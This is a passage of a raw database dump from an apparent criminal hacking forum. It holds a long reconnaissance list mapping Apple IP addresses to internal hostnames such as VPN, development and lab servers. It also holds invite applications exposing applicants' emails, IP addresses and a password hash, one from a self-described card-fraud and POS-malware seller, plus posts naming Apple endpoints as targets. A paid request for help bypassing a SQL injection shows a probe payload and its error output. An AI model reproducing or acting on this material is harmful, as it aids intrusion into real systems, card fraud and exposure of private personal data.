test502.calendarserver.org\n17.251.224.195 test503.calendarserver.org\n17.251.224.196 data.calendarserver.org\n17.251.224.213 svn.macports.org\n17.251.224.246 svn.webkit.org\n17.252.68.33 vpn-scv-xrr.apple.com\n17.252.68.34 vpn-scv-x2.apple.com\n17.252.68.35 vpn-scv-x3.apple.com\n17.252.68.36 vpn-scv-x4.apple.com\n17.252.68.39 cnv1.apple.com\n17.252.68.40 cnv0.apple.com\n17.252.68.41 avpn-ips-3.apple.com\n17.252.68.42 avpn-ips-2.apple.com\n17.252.68.43 avpn-ips-5.apple.com\n17.252.68.44 avpn-ips-6.apple.com\n17.252.68.45 applevpn.apple.com\n17.252.68.46 avpn-ips-8.apple.com\n17.252.68.47 avpn-ips-9.apple.com\n17.252.68.48 avpn-ips-10.apple.com\n17.252.68.49 avpn-ips-11.apple.com\n17.252.68.50 avpn-ips-12.apple.com\n17.252.68.51 avpn-ips-13.apple.com\n17.252.68.52 avpn-ips-14.apple.com\n17.252.68.53 avpn-ips-15.apple.com\n17.252.68.54 avpn-ips-16.apple.com\n17.252.68.55 avpn-ips-17.apple.com\n17.252.68.58 avpn-cnet-2.apple.com\n17.252.68.59 avpn-cnet-3.apple.com\n17.253.0.221 usqas1-vip-sx-001.aaplimg.com\n17.253.0.222 usqas1-vip-sx-002.aaplimg.com\n17.253.0.223 usqas1-vip-sx-003.aaplimg.com\n17.253.0.224 usqas1-vip-sx-004.aaplimg.com\n17.253.0.225 usqas1-vip-sx-005.aaplimg.com\n17.253.0.226 usqas1-vip-sx-006.aaplimg.com\n17.253.0.231 usqas1-vip-lx-001.aaplimg.com\n17.253.0.232 usqas1-vip-lx-002.aaplimg.com\n17.253.2.221 usnyc3-vip-sx-001.aaplimg.com\n17.253.2.222 usnyc3-vip-sx-002.aaplimg.com\n17.253.2.223 usnyc3-vip-sx-003.aaplimg.com\n17.253.2.224 usnyc3-vip-sx-004.aaplimg.com\n17.253.2.225 usnyc3-vip-sx-005.aaplimg.com\n17.253.2.226 usnyc3-vip-sx-006.aaplimg.com\n17.253.2.231 usnyc3-vip-lx-001.aaplimg.com\n17.253.2.232 usnyc3-vip-lx-002.aaplimg.com\n17.253.4.221 usatl4-vip-sx-001.aaplimg.com\n17.253.4.222 usatl4-vip-sx-002.aaplimg.com\n17.253.4.223 usatl4-vip-sx-003.aaplimg.com\n17.253.4.224 usatl4-vip-sx-004.aaplimg.com\n17.253.4.231 usatl4-vip-lx-001.aaplimg.com\n17.253.4.232 usatl4-vip-lx-002.aaplimg.com\n17.253.6.221 usmia1-vip-sx-001.aaplimg.com\n17.253.6.222 usmia1-vip-sx-002.aaplimg.com\n17.253.6.223 usmia1-vip-sx-003.aaplimg.com\n17.253.6.224 usmia1-vip-sx-004.aaplimg.com\n17.253.6.225 usmia1-vip-sx-005.aaplimg.com\n17.253.6.231 usmia1-vip-lx-001.aaplimg.com\n17.253.6.232 usmia1-vip-lx-002.aaplimg.com\n17.253.8.221 usdal2-vip-sx-001.aaplimg.com\n17.253.8.222 usdal2-vip-sx-002.aaplimg.com\n17.253.8.223 usdal2-vip-sx-003.aaplimg.com\n17.253.8.224 usdal2-vip-sx-004.aaplimg.com\n17.253.8.225 usdal2-vip-sx-005.aaplimg.com\n17.253.8.226 usdal2-vip-sx-006.aaplimg.com\n17.253.8.231 usdal2-vip-lx-001.aaplimg.com\n17.253.8.232 usdal2-vip-lx-002.aaplimg.com\n17.253.12.221 uschi3-vip-sx-001.aaplimg.com\n17.253.12.222 uschi3-vip-sx-002.aaplimg.com\n17.253.12.223 uschi3-vip-sx-003.aaplimg.com\n17.253.12.224 uschi3-vip-sx-004.aaplimg.com\n17.253.12.225 uschi3-vip-sx-005.aaplimg.com\n17.253.12.231 uschi3-vip-lx-001.aaplimg.com\n17.253.12.232 uschi3-vip-lx-002.aaplimg.com\n17.253.16.221 ussjc1-vip-sx-001.aaplimg.com\n17.253.16.222 ussjc1-vip-sx-002.aaplimg.com\n17.253.16.223 ussjc1-vip-sx-003.aaplimg.com\n17.253.16.224 ussjc1-vip-sx-004.aaplimg.com\n17.253.16.225 ussjc1-vip-sx-005.aaplimg.com\n17.253.16.231 ussjc1-vip-lx-001.aaplimg.com\n17.253.16.232 ussjc1-vip-lx-002.aaplimg.com\n17.253.20.221 ussea2-vip-sx-001.aaplimg.com\n17.253.20.222 ussea2-vip-sx-002.aaplimg.com\n17.253.20.223 ussea2-vip-sx-003.aaplimg.com\n17.253.20.224 ussea2-vip-sx-004.aaplimg.com\n17.253.20.225 ussea2-vip-sx-005.aaplimg.com\n17.253.20.231 ussea2-vip-lx-001.aaplimg.com\n17.253.20.232 ussea2-vip-lx-002.aaplimg.com\n17.253.32.225 nlams2-vip-001.aaplimg.com\n17.253.32.226 nlams2-vip-002.aaplimg.com\n17.253.34.225 uklon5-vip-001.aaplimg.com\n17.253.34.226 uklon5-vip-002.aaplimg.com\n17.253.64.225 hkhkg1-vip-001.aaplimg.com\n17.253.64.226 hkhkg1-vip-002.aaplimg.com\n17.253.66.225 ausyd2-vip-001.aaplimg.com\n17.253.66.226 ausyd2-vip-002.aaplimg.com\n17.254.0.24 nserver-n.apple.com\n17.254.0.41 foxriver.apple.com\n17.254.0.42 nserver2-n.apple.com\n17.254.0.50 nserver.apple.com\n17.254.0.59 nserver2.apple.com\n17.254.0.60 scv-littlebuddy1.apple.com\n17.254.0.64 connect2-java.apple.com\n17.254.0.65 scv-wsidecar.apple.com\n17.254.0.101 devtools.apple.com\n17.254.0.139 velocity.apple.com\n17.254.0.236 vlt-ehla.apple.com\n17.254.1.60 ftp.qtv.apple.com\n17.254.1.175 storedev-gidget.apple.com\n17.254.1.217 idmsa-scv.apple.com\n17.254.2.4 lovington.apple.com\n17.254.2.31 selfservice.apple.com\n17.254.2.53 rsvp.apple.com\n17.254.2.64 daw-scv.apple.com\n17.254.2.69 origin-selfsolve.apple.com\n17.254.2.98 village.apple.com\n17.254.2.116 developerns.apple.com\n17.254.2.117 appleid-scv.apple.com\n17.254.2.129 developerns.apple.com\n17.254.2.131 webgdv.apple.com\n17.254.2.133 scv-ipodrocks.apple.com\n17.254.2.146 vs6-1.apple.com\n17.254.2.147 vs6-2.apple.com\n17.254.2.149 vs7-2.apple.com\n17.254.2.150 origin-helpviewer.apple.com\n17.254.2.156 developerns.apple.com\n17.254.2.157 scv-searchcgi.apple.com\n17.254.2.203 t2valenn.apple.com\n17.254.2.230 itntrvl.apple.com\n17.254.2.240 scv-ssl.apple.com\n17.254.2.249 service.apple.com\n17.254.3.20 dvdsp.apple.com\n17.254.3.38 vs5-2.apple.com\n17.254.3.41 scv-store.apple.com\n17.254.3.42 scv1-store.apple.com\n17.254.3.55 sherlockdevelopert.apple.com\n17.254.3.57 gdv.apple.com\n17.254.3.94 survey2.apple.com\n17.254.3.97 lnx-helpviewer.apple.com\n17.254.3.98 iaprvext.apple.com\n17.254.3.102 veloxs.apple.com\n17.254.3.135 reg.devworld.apple.com\n17.254.3.136 survey.devworld.apple.com\n17.254.3.138 sc5mv.apple.com\n17.254.3.239 quicktimelive.apple.com\n17.254.4.136 www.webdvd.org\n17.254.5.20 vgr.apple.com\n17.254.5.21 vgr001.apple.com\n17.254.5.22 vgr002.apple.com\n17.254.5.23 vgr003.apple.com\n17.254.5.24 vgr004.apple.com\n17.254.5.25 vgr005.apple.com\n17.254.5.26 vgr006.apple.com\n17.254.5.27 vgr007.apple.com\n17.254.5.28 vgr008.apple.com\n17.254.5.29 vgr009.apple.com\n17.254.5.30 vgr010.apple.com\n17.254.5.31 vgr011.apple.com\n17.254.5.32 vgr012.apple.com\n17.254.5.38 vgr-mc001.apple.com\n17.254.5.39 vgr-mc002.apple.com\n17.254.6.18 msbadger-asia-vip.apple.com\n17.254.6.20 badger-vip.apple.com\n17.254.6.36 badger-txnvip.apple.com\n17.254.6.190 msbadger-txnvip.apple.com\n17.254.12.25 adcevents.apple.com\n17.254.12.26 adcinvoice.apple.com\n17.254.12.31 adctv.apple.com\n17.254.12.33 sherlockdeveloper.apple.com\n17.254.12.36 wwdcvolunteers.apple.com\n17.254.12.89 adcsurvey.apple.com\n17.254.13.54 vpnupdate.apple.com\n17.254.15.4 leopardvpnext.apple.com\n17.254.15.6 tigervpn.apple.com\n17.254.15.8 applevpn-tigercc.apple.com\n17.254.15.9 leopardvpn.apple.com\n17.254.15.10 leopardvpn2ext.apple.com\n17.254.15.13 ivpn1.apple.com\n17.254.15.14 ivpn2.apple.com\n17.254.15.20 asavpn.apple.com\n17.254.16.23 privftp.apple.com\n17.254.17.46 nvidia.apple.com\n17.254.17.54 trac.calendarserver.org\n17.254.17.116 coreserverbuild.apple.com\n17.254.17.140 alacsvc.apple.com\n17.254.17.228 qtvr20test.apple.com\n17.254.17.241 onlinetravel.apple.com\n17.254.20.9 edu-vpp-old.apple.com\n17.254.20.13 jobevents.apple.com\n17.254.20.61 enroll.vpp-old.itunes.apple.com\n17.254.20.71 nvidia.apple.com\n17.254.20.78 privp4.apple.com\n17.254.20.135 agents-private.apple.com\n17.254.20.157 volk.macosforge.org\n17.254.20.164 seedsurvey.apple.com\n17.254.20.172 sbv.apple.com\n17.254.20.173 sbv1.apple.com\n17.254.20.174 sbv2.apple.com\n17.254.20.180 qtdevseed.apple.com\n17.254.20.188 vac.apple.com\n17.254.20.211 mdev.apple.com\n17.254.20.212 pdev.apple.com\n17.254.20.215 ical-living-on.apple.com\n17.254.20.228 svn.macosforge.org\n17.254.20.231 volk4.macosforge.org\n17.254.20.239 trac.calendarserver.org\n17.254.20.249 ios-device-checkins.apple.com\n17.254.21.4 sacidev-vpn1.apple.com\n17.254.21.11 poduat-vpn.apple.com\n17.254.21.52 mdev2.apple.com\n17.254.21.56 cl-dev.apple.com\n17.254.21.57 devstats.apple.com\n17.254.21.83 jcmdev.apple.com\n17.254.21.196 sacidev-vpni1.apple.com\n17.254.128.100 vpn-scv.apple.com\n17.254.128.200 vpn-scv-x.apple.com\n17.255.52.55 waves.apple.com\n17.255.77.240 rwavlabserver11.apple.com\n17.255.77.241 rwavlabserver10.apple.com\n17.255.77.242 rwavlabserver9.apple.com\n17.255.77.243 rwavlabserver8.apple.com\n17.255.77.244 rwavlabserver7.apple.com\n17.255.77.245 rwavlabserver6.apple.com\n17.255.77.246 rwavlabserver5.apple.com\n17.255.77.247 rwavlabserver4.apple.com\n17.255.77.248 rwavlabserver3.apple.com\n17.255.77.249 rwavlabserver2.apple.com\n17.255.77.250 rwavlabserver1.apple.com\n17.255.78.236 fodlabserver15.apple.com\n17.255.78.237 fodlabserver14.apple.com\n17.255.78.238 fodlabserver13.apple.com\n17.255.78.239 fodlabserver12.apple.com\n17.255.78.240 fodlabserver11.apple.com\n17.255.78.241 fodlabserver10.apple.com\n17.255.78.242 fodlabserver9.apple.com\n17.255.78.243 fodlabserver8.apple.com\n17.255.78.244 fodlabserver7.apple.com\n17.255.78.245 fodlabserver6.apple.com\n17.255.78.246 fodlabserver5.apple.com\n17.255.78.247 fodlabserver4.apple.com\n17.255.78.248 fodlabserver3.apple.com\n17.255.78.249 fodlabserver2.apple.com\n17.255.78.250 fodlabserver1.apple.com\n17.255.79.239 projectxserve8.apple.com\n17.255.79.240 projectxserve1.apple.com\n17.255.79.241 projectxserve2.apple.com\n17.255.79.242 projectxserve3.apple.com\n17.255.79.243 projectxserve4.apple.com\n17.255.79.244 projectxserve5.apple.com\n17.255.79.245 projectxserve6.apple.com\n17.255.79.246 projectxserve7.apple.com\n17.255.128.50 winsrv.ebc.apple.com\n17.255.128.59 xserve01.ebc.apple.com\n17.255.128.60 xserve01-lom.ebc.apple.com\n17.255.128.61 xserve02.ebc.apple.com\n17.255.128.62 xserve02-lom.ebc.apple.com\n17.255.128.63 xserve03.ebc.apple.com\n17.255.128.64 xserve03-lom.ebc.apple.com\n17.255.128.65 xserve04.ebc.apple.com\n17.255.128.66 xserve04-lom.ebc.apple.com\n17.255.128.67 xserve05.ebc.apple.com\n17.255.128.68 xserve05-lom.ebc.apple.com\n17.255.128.71 jhr-atv.ebc.apple.com\n17.255.128.72 jhr-savant.ebc.apple.com\n17.255.128.76 jgr-atv.ebc.apple.com\n17.255.128.77 jgr-savant.ebc.apple.com\n17.255.128.81 mlk-atv.ebc.apple.com\n17.255.128.82 mlk-savant.ebc.apple.com\n17.255.216.51 cvs.opensource.apple.com\n[/LIST]\n\n [/code]', 1, 0, '', 0, 1, 0, 0, 0), (1943, 1659, 0, 'Invite', 2, '{$name}', 1410025941, '[SIZE=\'4\'][COLOR=\'Sienna\']n33tlix[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: akarta315h@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 196.45.24.55\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1944, 1660, 0, 'Invite', 2, '{$name}', 1410029704, '[SIZE=\'4\'][COLOR=\'Sienna\']jaxtell3r[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: jaxtell3r@exploit.im\n[b]e-mail[/b]: jaxtell3r@zmail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 98.248.237.33\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.resellerratings.com/user/jaxtell3 | http://www.resellerratings.com/user/jaxtell3 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1945, 1661, 0, 'Invite', 2, '{$name}', 1410036730, '[SIZE=\'4\'][COLOR=\'Sienna\']Mouse[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: papamouse@is-a-furry.org\n[b]e-mail[/b]: papamouse@mail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 99.194.25.204\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : mouse : miki-mouse@mail.ru : 85.30.195.64 : 0751948b95566f2ff61fc7532e11f5c6\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://mouse.org | mouse.org \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1946, 1658, 1942, 'w0rm', 1, '', 1410041057, '_ttps://trainingadmin.apple.com/plateau/user/selfRegisterInit.do', 1, 0, '', 0, 1, 0, 0, 0), (1948, 1662, 0, 'Invite', 2, '{$name}', 1410055038, '[SIZE=\'4\'][COLOR=\'Sienna\']Davenjah[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: admin@davenjah.su\n[b]e-mail[/b]: admin@davenjah.su\n[b]Info[/b]: more than 10 years in Dumps/CC business. having shops and POS malwares.\r\n\r\n@Davenjah.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 195.154.171.5\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://newsaboutfrauds.blogspot.com/2008_08_01_archive.html | http://newsaboutfrauds.blogspot.com/2008_08_01_archive.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1949, 1658, 1942, 'w0rm', 1, '', 1410055888, '[url]https://trainingadmin.apple.com/jbossws/[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1950, 1663, 0, 'Invite', 2, '{$name}', 1410060418, '[SIZE=\'4\'][COLOR=\'Sienna\']d4rk0ding[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: d4rk0ding@exploit.im\n[b]e-mail[/b]: d4rk0ding@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 75.156.90.71\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36 OPR/24.0.1558.53 (Edition Campaign 51)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://underc0de.org/foro/profile/d4rk0ding/?area...;sa... | http://underc0de.org/foro/profile/d4rk0ding/?area...;sa... \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1951, 1664, 0, 'Invite', 2, '{$name}', 1410077195, '[SIZE=\'4\'][COLOR=\'Sienna\']Soek[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 686397005\n[b]e-mail[/b]: theworldhack@secure-mail.biz\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 86.57.180.46\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/537.16 (KHTML, like Gecko) Version/5.0 Safari/537.16\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/JuliaSoek | https://twitter.com/JuliaSoek \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1952, 1665, 0, 'Invite', 2, '{$name}', 1410099913, '[SIZE=\'4\'][COLOR=\'Sienna\']altukhov[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: altukhov@jabber.at\n[b]e-mail[/b]: kotak4amal@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 36.81.124.94\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.panoramio.com/user/4605112 | http://www.panoramio.com/user/4605112 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1953, 1666, 0, 'lumbricus', 39, 'MVC -SQLi - 3 BTC', 1410165986, 'Need help bypass: \r\n\r\nPOST: \r\n\r\n[CODE]Parabol=2&MagicVar=91\'[/CODE]\r\n\r\n\r\nERROR: \r\n\r\n[HTML]{\"Message\":\"Conversion failed when converting the varchar value \\u002791\\u0027\\u0027 to data type int.\",\"StackTrace\":\" at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\\r\\n at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\\r\\n at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean\\u0026 dataReady)\\r\\n at System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString)\\r\\n at System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async, Int32 timeout, Task\\u0026 task, Boolean asyncWrite, SqlDataReader ds)\\r\\n at System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, TaskCompletionSource`1 completion, Int32 timeout, Task\\u0026 task, Boolean asyncWrite)\\r\\n at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\\r\\n at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\\r\\n at StackExchange.Profiling.Data.ProfiledDbCommand.ExecuteNonQuery()\\r\\n at Dapper.SqlMapper.ExecuteCommand(IDbConnection cnn, IDbTransaction transaction, String sql, Action`2 paramReader, Object obj, Nullable`1 commandTimeout, Nullable`1 commandType) in c:\\\\Dev\\\\Dapper\\\\Dapper\\\\SqlMapper.cs:line 1624\\r\\n at Dapper.SqlMapper.Execute(IDbConnection cnn, String sql, Object param, IDbTransaction transaction, Nullable`1 commandTimeout, Nullable`1 commandType) in e:\\\\zbotpanel\\\\Dapper\\\\Dapper\\\\SqlMapper.cs:line 707\\r\\n at zbotpanel.Data.Dapper.BaseDapperRepository.RunNonQuery(QueryType queryType, String command, Object parameters, DbTransaction transaction) in g:\\\\src\\\\trunk\\\\Data.Dapper\\\\BaseDapperRepository.cs:line 194\\r\\n at zbotpanel.Core.Data.Repository.CustProfileRepository.Save_Genres(Int32 custProfileID, String genreIDs)\\r\\n at Services.UserAccount.Domain.UserAccountRepository.SaveGenres(Int32 value, String genreIDs) in g:\\\\src\\\\trunk\\\\Services.UserAccount\\\\Domain\\\\UserAccountRepository.cs:line 109\\r\\n at Services.UserAccount.Domain.AccountAuthorisation.UsersService.SetUserPreferences(Int32 customerProfileId, Int32 preferenceState, String genreIDs, Nullable`1 visitorLocationId) in g:\\\\src\\\\trunk\\\\Services.UserAccount\\\\Domain\\\\AccountAuthorisation\\\\UsersService.cs:line 689\\r\\n at Services.UserAccount.Controllers.UsersAccountController.LocationGenrePreferences(VisitorInfo visitorInfo, LocationGenreModel preferences) in g:\\\\src\\\\trunk\\\\Services.UserAccount\\\\Controllers\\\\UsersAccountController.cs:line 231\\r\\n at lambda_method(Closure , ControllerBase , Object[] )\\r\\n at System.Web.Mvc.ReflectedActionDescriptor.Execute(ControllerContext controllerContext, IDictionary`2 parameters)\\r\\n at System.Web.Mvc.ControllerActionInvoker.InvokeActionMethod(ControllerContext controllerContext, ActionDescriptor actionDescriptor, IDictionary`2 parameters)\\r\\n at System.Web.Mvc.Async.AsyncControllerActionInvoker.\\u003c\\u003ec__DisplayClass42.\\u003cBeginInvokeSynchronousActionMethod\\u003eb__41()\\r\\n at System.Web.Mvc.Async.AsyncControllerActionInvoker.\\u003c\\u003ec__DisplayClass37.\\u003c\\u003ec__DisplayClass39.\\u003cBeginInvokeActionMethodWithFilters\\u003eb__33()\\r\\n at System.Web.Mvc.Async.AsyncControllerActionInvoker.\\u003c\\u003ec__DisplayClass4f.\\u003cInvokeActionMethodFilterAsynchronously\\u003eb__49()\"}[/HTML]', 1, 0, '', 0, 1, 0, 0, 0), (1954, 1666, 1953, 'lumbricus', 39, '', 1410167060, 'Interesting:\n\n[CODE]Parabol=2&MagicVar=-2[/CODE]\n\n\nERROR: \n\n[CODE]The INSERT statement conflicted with the FOREIGN KEY constraint \\\"FK_zbotProfile2\\\". The conflict occurred in database \\\"zBotDB\\\", table \\\"dbo.Type\\\", column \\u0027TypeID\\u0027.\\r\\nThe statement has been terminated.[/CODE]', 1, 0, '', 0, 1, 0, 0, 0), (1957, 1667, 0, 'Invite', 2, '{$name}', 1410185271, 